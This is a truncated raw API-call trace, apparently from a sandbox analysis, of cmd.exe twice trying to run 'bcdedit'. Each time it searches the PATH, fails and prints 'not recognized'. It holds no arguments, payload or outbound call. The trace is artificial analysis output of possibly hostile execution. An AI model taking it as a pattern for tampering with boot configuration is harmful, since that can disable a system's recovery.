RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0xb40) returned 0x119240 [0163.462] FreeEnvironmentStringsA (penv="=") returned 1 [0163.462] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0163.462] GetProcessHeap () returned 0x100000 [0163.462] RtlFreeHeap (HeapHandle=0x100000, Flags=0x0, BaseAddress=0x119240) returned 1 [0163.462] GetEnvironmentStringsW () returned 0x1186f8* [0163.462] GetProcessHeap () returned 0x100000 [0163.462] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0xb40) returned 0x119240 [0163.463] FreeEnvironmentStringsA (penv="=") returned 1 [0163.463] GetProcessHeap () returned 0x100000 [0163.463] RtlFreeHeap (HeapHandle=0x100000, Flags=0x0, BaseAddress=0x106580) returned 1 [0163.463] DeleteProcThreadAttributeList (in: lpAttributeList=0xb9f4e8 | out: lpAttributeList=0xb9f4e8) [0163.463] ??_V@YAXPAX@Z () returned 0x1 [0163.463] GetConsoleTitleW (in: lpConsoleTitle=0xb9f9e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0163.532] malloc (_Size=0xffce) returned 0x2127e0 [0163.532] ??_V@YAXPAX@Z () returned 0xb9f774 [0163.533] malloc (_Size=0xffce) returned 0x2227b8 [0163.533] ??_V@YAXPAX@Z () returned 0xb9f52c [0163.534] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0163.534] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0163.534] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0163.534] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0163.534] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0163.534] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0163.535] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0163.535] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0163.535] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0163.535] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0163.535] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0163.535] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0163.535] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0163.535] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0163.535] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0163.536] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0163.536] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0163.536] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0163.536] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0163.536] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0163.541] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0163.541] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0163.541] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0163.541] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0163.541] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0163.541] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0163.541] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0163.541] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0163.542] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0163.542] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0163.542] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0163.542] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0163.542] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0163.542] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0163.543] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0163.543] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0163.543] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0163.543] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0163.543] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0163.543] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0163.543] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0163.543] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0163.544] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0163.544] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0163.544] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0163.544] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0163.545] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0163.545] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0163.545] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0163.545] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0163.545] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0163.545] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0163.551] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0163.551] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0163.551] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0163.551] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0163.551] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0163.551] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0163.551] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0163.551] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0163.551] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0163.551] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0163.551] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0163.551] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0163.551] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0163.551] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0163.551] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0163.551] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0163.551] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0163.551] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0163.551] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0163.551] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0163.551] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0163.551] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0163.551] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0163.551] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0163.551] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0163.551] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0163.551] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0163.551] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0163.551] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0163.551] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0163.552] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0163.552] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0163.552] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0163.552] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0163.552] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0163.552] ??_V@YAXPAX@Z () returned 0x1 [0163.552] GetProcessHeap () returned 0x100000 [0163.552] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0xffd6) returned 0x129db8 [0163.554] GetProcessHeap () returned 0x100000 [0163.554] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x80) returned 0x1046f0 [0163.554] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0163.554] malloc (_Size=0xffce) returned 0x2227b8 [0163.555] ??_V@YAXPAX@Z () returned 0xb9f2ac [0163.555] GetProcessHeap () returned 0x100000 [0163.555] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x1ffa4) returned 0x139d98 [0163.556] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x139da0, lpFilePart=0xb9f2cc | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xb9f2cc*="Desktop") returned 0x17 [0163.556] SetErrorMode (uMode=0x0) returned 0x1 [0163.556] GetProcessHeap () returned 0x100000 [0163.556] RtlReAllocateHeap (Heap=0x100000, Flags=0x0, Ptr=0x139d98, Size=0x48) returned 0x139d98 [0163.556] GetProcessHeap () returned 0x100000 [0163.556] RtlSizeHeap (HeapHandle=0x100000, Flags=0x0, MemoryPointer=0x139d98) returned 0x48 [0163.556] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xfbf840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0163.556] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0163.557] GetProcessHeap () returned 0x100000 [0163.557] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x1b4) returned 0x107f60 [0163.557] GetProcessHeap () returned 0x100000 [0163.557] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x360) returned 0x108120 [0163.560] GetProcessHeap () returned 0x100000 [0163.560] RtlReAllocateHeap (Heap=0x100000, Flags=0x0, Ptr=0x108120, Size=0x1b6) returned 0x108120 [0163.560] GetProcessHeap () returned 0x100000 [0163.560] RtlSizeHeap (HeapHandle=0x100000, Flags=0x0, MemoryPointer=0x108120) returned 0x1b6 [0163.560] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xfbf840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0163.560] GetProcessHeap () returned 0x100000 [0163.560] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0xe0) returned 0x104778 [0163.560] GetProcessHeap () returned 0x100000 [0163.560] RtlReAllocateHeap (Heap=0x100000, Flags=0x0, Ptr=0x104778, Size=0x76) returned 0x104778 [0163.560] GetProcessHeap () returned 0x100000 [0163.560] RtlSizeHeap (HeapHandle=0x100000, Flags=0x0, MemoryPointer=0x104778) returned 0x76 [0163.560] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.560] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0xb9f058, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9f058) returned 0xffffffff [0163.560] GetLastError () returned 0x2 [0163.560] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.561] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0xb9f058, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9f058) returned 0xffffffff [0163.561] GetLastError () returned 0x2 [0163.561] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.561] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0xb9f058, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9f058) returned 0xffffffff [0163.561] GetLastError () returned 0x2 [0163.561] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.561] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0xb9f058, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9f058) returned 0xffffffff [0163.561] GetLastError () returned 0x2 [0163.561] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.562] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0xb9f058, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9f058) returned 0xffffffff [0163.562] GetLastError () returned 0x2 [0163.562] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.562] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0xb9f058, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9f058) returned 0xffffffff [0163.562] GetLastError () returned 0x2 [0163.562] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.562] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0xb9f058, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9f058) returned 0xffffffff [0163.562] GetLastError () returned 0x2 [0163.562] ??_V@YAXPAX@Z () returned 0x1 [0163.562] _get_osfhandle (_FileHandle=2) returned 0x94 [0163.562] GetFileType (hFile=0x94) returned 0x2 [0163.563] GetStdHandle (nStdHandle=0xfffffff4) returned 0x94 [0163.563] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0xb9f4a4 | out: lpMode=0xb9f4a4) returned 1 [0163.568] _get_osfhandle (_FileHandle=2) returned 0x94 [0163.568] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x94, lpConsoleScreenBufferInfo=0xb9f4f4 | out: lpConsoleScreenBufferInfo=0xb9f4f4) returned 1 [0163.701] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0xfcb990, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d [0163.715] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0xfcb990, nSize=0x2000, Arguments=0xb9f524 | out: lpBuffer="'bcdedit' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x62 [0163.715] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0xfcb990*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xb9f4d8, lpReserved=0x0 | out: lpBuffer=0xfcb990*, lpNumberOfCharsWritten=0xb9f4d8*=0x62) returned 1 [0163.732] ??_V@YAXPAX@Z () returned 0x1 [0163.732] GetConsoleTitleW (in: lpConsoleTitle=0xb9f988, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0163.732] malloc (_Size=0xffce) returned 0x2127e0 [0163.732] ??_V@YAXPAX@Z () returned 0xb9f714 [0163.733] malloc (_Size=0xffce) returned 0x2227b8 [0163.733] ??_V@YAXPAX@Z () returned 0xb9f4cc [0163.733] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0163.733] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0163.733] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0163.733] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0163.733] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0163.733] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0163.733] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0163.733] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0163.733] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0163.733] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0163.733] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0163.733] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0163.733] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0163.733] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0163.733] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0163.733] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0163.733] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0163.733] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0163.733] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0163.733] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0163.733] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0163.733] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0163.733] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0163.733] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0163.733] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0163.733] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0163.733] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0163.733] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0163.733] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0163.733] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0163.734] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0163.734] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0163.734] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0163.734] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0163.734] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0163.734] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0163.734] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0163.734] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0163.734] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0163.734] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0163.734] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0163.734] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0163.734] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0163.734] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0163.734] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0163.734] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0163.734] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0163.734] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0163.734] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0163.734] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0163.734] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0163.734] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0163.734] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0163.734] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0163.734] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0163.734] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0163.734] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0163.734] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0163.734] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0163.734] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0163.734] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0163.734] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0163.734] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0163.734] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0163.735] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0163.735] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0163.735] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0163.735] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0163.735] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0163.735] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0163.735] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0163.735] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0163.735] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0163.735] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0163.735] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0163.735] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0163.735] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0163.735] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0163.735] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0163.735] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0163.735] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0163.735] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0163.735] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0163.735] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0163.735] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0163.735] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0163.735] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0163.735] ??_V@YAXPAX@Z () returned 0x1 [0163.735] GetProcessHeap () returned 0x100000 [0163.735] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0xffd6) returned 0x13cd18 [0163.736] GetProcessHeap () returned 0x100000 [0163.736] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x60) returned 0x104df0 [0163.736] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0163.736] malloc (_Size=0xffce) returned 0x2227b8 [0163.736] ??_V@YAXPAX@Z () returned 0xb9f24c [0163.736] GetProcessHeap () returned 0x100000 [0163.736] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x1ffa4) returned 0x14ccf8 [0163.738] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x14cd00, lpFilePart=0xb9f26c | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xb9f26c*="Desktop") returned 0x17 [0163.738] SetErrorMode (uMode=0x0) returned 0x1 [0163.738] GetProcessHeap () returned 0x100000 [0163.738] RtlReAllocateHeap (Heap=0x100000, Flags=0x0, Ptr=0x14ccf8, Size=0x48) returned 0x14ccf8 [0163.738] GetProcessHeap () returned 0x100000 [0163.738] RtlSizeHeap (HeapHandle=0x100000, Flags=0x0, MemoryPointer=0x14ccf8) returned 0x48 [0163.738] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xfbf840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0163.738] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0163.738] GetProcessHeap () returned 0x100000 [0163.738] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x1b4) returned 0x1082e0 [0163.738] GetProcessHeap () returned 0x100000 [0163.738] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x360) returned 0x1054f0 [0163.738] GetProcessHeap () returned 0x100000 [0163.738] RtlReAllocateHeap (Heap=0x100000, Flags=0x0, Ptr=0x1054f0, Size=0x1b6) returned 0x1054f0 [0163.738] GetProcessHeap () returned 0x100000 [0163.738] RtlSizeHeap (HeapHandle=0x100000, Flags=0x0, MemoryPointer=0x1054f0) returned 0x1b6 [0163.738] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xfbf840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0163.738] GetProcessHeap () returned 0x100000 [0163.738] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0xe0) returned 0x1004a0 [0163.738] GetProcessHeap () returned 0x100000 [0163.738] RtlReAllocateHeap (Heap=0x100000, Flags=0x0, Ptr=0x1004a0, Size=0x76) returned 0x1004a0 [0163.738] GetProcessHeap () returned 0x100000 [0163.738] RtlSizeHeap (HeapHandle=0x100000, Flags=0x0, MemoryPointer=0x1004a0) returned 0x76 [0163.738] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.738] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0xb9eff8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9eff8) returned 0xffffffff [0163.739] GetLastError () returned 0x2 [0163.739] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.739] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0xb9eff8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9eff8) returned 0xffffffff [0163.739] GetLastError () returned 0x2 [0163.739] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.739] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0xb9eff8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9eff8) returned 0xffffffff [0163.739] GetLastError () returned 0x2 [0163.739] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.739] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0xb9eff8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9eff8) returned 0xffffffff [0163.740] GetLastError () returned 0x2 [0163.740] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.740] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0xb9eff8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9eff8) returned 0xffffffff [0163.740] GetLastError () returned 0x2 [0163.740] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.740] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0xb9eff8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9eff8) returned 0xffffffff [0163.740] GetLastError () returned 0x2 [0163.741] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0163.741] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0xb9eff8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9eff8) returned 0xffffffff [0163.741] GetLastError () returned 0x2 [0163.741] ??_V@YAXPAX@Z () returned 0x1 [0163.741] _get_osfhandle (_FileHandle=2) returned 0x94 [0163.741] GetFileType (hFile=0x94) returned 0x2 [0163.741] GetStdHandle (nStdHandle=0xfffffff4) returned 0x94 [0163.741] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0xb9f444 | out: lpMode=0xb9f444) returned 1 [0163.742] _get_osfhandle (_FileHandle=2) returned 0x94 [0163.742] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x94, lpConsoleScreenBufferInfo=0xb9f494 | out: lpConsoleScreenBufferInfo=0xb9f494) returned 1 [0163.742] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0xfcb990, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d [0163.742] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0xfcb990, nSize=0x2000, Arguments=0xb9f4c4 | out: lpBuffer="'bcdedit' is not recognized as an 